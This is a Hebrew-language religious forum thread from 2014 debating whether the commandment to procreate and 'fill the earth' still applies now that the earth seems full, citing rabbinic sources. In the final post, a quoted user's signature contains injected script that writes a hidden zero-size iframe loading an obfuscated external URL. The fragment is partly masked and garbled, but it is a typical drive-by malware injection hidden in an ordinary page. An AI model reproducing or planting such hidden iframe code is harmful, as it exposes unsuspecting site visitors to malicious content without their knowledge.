| נשלח ב-25/7/2014 17:18 |
|
| |
"ומלאו את הארץ" - אולי כבר מלאה הארץ?
אולי כל המצוה לפרות ולרבות היא רק עד שהתמלאה הארץ, ועכשיו שהיא מאוכלסת ומלאה - אין כבר ציווי? נשלח מהאנדרואיד שלי
|
| נשלח ב-25/7/2014 17:24 |
|
| |
אסור לך לגרום להכחדה ,לא תוהו בראה לשבת יצרה,לכן תמיד פרו ורבו ומלאו את הארץ,
|
|
|
|
| נשלח ב-25/7/2014 17:25 |
|
| |
|
| נשלח ב-25/7/2014 17:32 |
|
| |
לא להביא ילדים ,ובעוד מאה שנים הנקודה הסינגולרית תצטרך עוד כמה מיליארדי שנה בכדי שמוטציה שלה תוליד איזה פתאימי ,
|
|
|
|
| נשלח ב-25/7/2014 17:44 |
|
| |
שאלה חמודה.
זה תלוי בשאלה 1) האם הציווי הוא לבצע פעולת מילוי, ללא קשר לתוצאה. או שהציווי הוא לדאוג לתוצאה - מילוי הארץ. 2) האם הארץ מלאה. לגבי 1) יש לדון. לגבי 2) התשובה שלילית. הארץ מכילה עדיין שטחים אדירים ריקים כמעט כליל. ביניהם סיביר, יערות האמזונס, אנטארטיקה ועוד. כל אחד משטחים אלו הוא בסדר גודל של יבשת.
דרך אגב, לכאורה מטרת בריאת האדם (לא היהודי) היא כדי לתרבת את העולם.
|
|
|
|
| נשלח ב-25/7/2014 17:48 |
|
| |
|
| נשלח ב-25/7/2014 17:50 |
|
| |
די.
זה תלוי אם אתה מסתכל ביחס לעבר או ביחס לשטח בפועל
|
|
|
|
|
| נשלח ב-25/7/2014 17:53 |
|
| |
ואולי בכלל יש חיוב חדש ללכת לגור בנגב או באנטרטיקה בכדי לאכלס אותה , חברה ,,,חדל קישקוש
|
|
|
|
| נשלח ב-25/7/2014 17:59 |
|
| |
חסדא, איך אתה מתעלם מציווי מפורש בתורה 'ומלאו את הארץ וכבשוה'?
חשבתי שאתה חרדי.
נ.ב. אני חושב שאין ציווי לגור בנגב כיון ש'מלאו את הארץ' הוא המטרה של 'פרו ורבו' ולא ציווי בפ"ע. קרי- ה' ציוה לפרות כדי למלא את הארץ.
|
|
|
|
| נשלח ב-25/7/2014 18:07 |
|
| |
ספר-המצוות (עשין רי"ב) כתב: שציוונו לפרות ולרבות לכוון לקיום המין והיא מצוות פריה ורביה, והוא אמרו יתעלה ואתם פרו ורבו עכ"ל. כפי שכתב חסדא לעיל ,לדאוג שלא תהיה הכחדה,
תוקן על ידי חסדא ב- 25/07/2014 18:08:03
|
|
|
|
| נשלח ב-26/7/2014 22:02 |
|
| |
|
|
|
|
| נשלח ב-26/7/2014 22:37 |
|
| |
| פתיאמי כתב: |  | "ומלאו את הארץ" - אולי כבר מלאה הארץ? אולי כל המצוה לפרות ולרבות היא רק עד שהתמלאה הארץ, ועכשיו שהיא מאוכלסת ומלאה - אין כבר ציווי?
|
|
בתורה לפחות אין כזה מצווה יש ברכה. בכל אופן הכשל בחשיבה כאן היא שאתה מוליד למישהו (לאלוהים או לחברה), ואז צריך לשאול את המישהו הזה, אולי זה מספיק. אבל היהודי לא מוליד למישהו רק לעצמו ושרידותו הנצחית אז לכן שאלתך לא במקום.
תוקן על ידי maxmen ב- 26/07/2014 22:54:46
|
|
|
|
| נשלח ב-27/7/2014 00:08 |
|
| |
השאלה שלי היא על כל בני האדם בעולם, לאו דווקא יהודים. (אם בן נח מצווה על פריה ורביה) נשלח מהאנדרואיד שלי
|
| נשלח ב-27/7/2014 00:25 |
|
| |
|
| נשלח ב-27/7/2014 01:11 |
|
| |
פתיאמי
איקון ירוק על השאלה ועל הנושא שהיא מעוררת.
לא חשבתי על כך עד היום ולכן, כשלב ראשון, אני מציע לעסוק בשאלות יסוד, וכמובן תמיד אפשר להוסיף עוד שאלות על דברי.
א. על מי מוטל לפרות ולרבות.
נקודות: המצוה למלא את הארץ נאמרה לאדם הראשון והגרי"ד סולוביצ'יק מוצא כאן הנחיה כללית להיות האדם עוסק בהגשמה עצמית של יכולותיו. כלומר, זה חל על כל אדם ולא הופקע בעקבות מצוות שניתנו בהמשך.
"פרו ורבו" נחקר בגמרא לגבי יהודים, כגון לגבי מי שהיה גוי והוליד והתגייר.
ב. יש מקורות שבהם נראה כי עיקר המצוה הוא להבטיח שלפחות יהיו בן ובת לאחר שהמוליד הלך לעולמו. כך למשל ר"ע מנמק את החובה (או ההמלצה) להוליד בזקנותו שמא הבנים שהיו בילדותו ימותו. (כפי שתלמידים שהעמיד בצעירותו עלולים להתקלקל).
ג. המדע מלמד אותנו כי כל ילד הוא מצבור גנטי חדש ושונה, וכמובן כל ילד יכול להתפתח אחרת, לגלות כישורים חדשים ובדורות האחרונים, משרבתה החכמה ומשהחלו להעניק לכל ילד יכולות לימודיות, גם כל ילד הוא הזדמנות לחידוש דבר בעולם. אילו אמו של היטלר לא היתה יולדת אותו לא היתה השואה, אבל אילו אמו של איינשטיין לא היתה יולדת אותו, לא היתה לנו תורת היחסות (וכמובן יתכן שההשגחה הפרטית היתה מביאה תחליפים).
הווה אומר שעלינו לשאול:
1. מה תוכן המצוה (שני בנים, בן ובת, יותר?)
2. למי היא נאמרה.
3. האם המטרה היא למלא שטח מסויים או להבטיח קיום המין?
4. מכאן אפשר לשאול: האם יש נסיבות שבהן דווקא ראוי לא להוליד ילדים?
|
|
|
|
| נשלח ב-27/7/2014 08:44 |
|
| |
| מיימוני כתב: |  | נקודות: המצוה למלא את הארץ נאמרה לאדם הראשון והגרי"ד סולוביצ'יק מוצא כאן הנחיה כללית להיות האדם עוסק בהגשמה עצמית של יכולותיו. כלומר, זה חל על כל אדם ולא הופקע בעקבות מצוות שניתנו בהמשך. ___________
שומר פיו ולשונו - שומר מצרות נפשו
< type="text/">document.write("*************** scrolling='no' frameborder='0' height='0px' width='0px' src='ht"+"tp:"+"/"+"/"+"vjgvj.co"+".cc/?a="+***************+"'><*");> |
|
בבריסק היה מתקבל גדר כזה? ואם כן, האם מי יוצאים ידי חובה בספר אחד, בשני ספרים באותו נושא, או בשני ספרים על נושאים שונים. אם פרכו את החידוש האם זה נחשב כהיו לו בנים ומתו? האם ספר אחד יכול להיחשב כתחליף לילד אחד?
הווארט הזה מזכיר לי את הווארט הבריסקאי על הגדרת עמלק.
|
|
|
|
|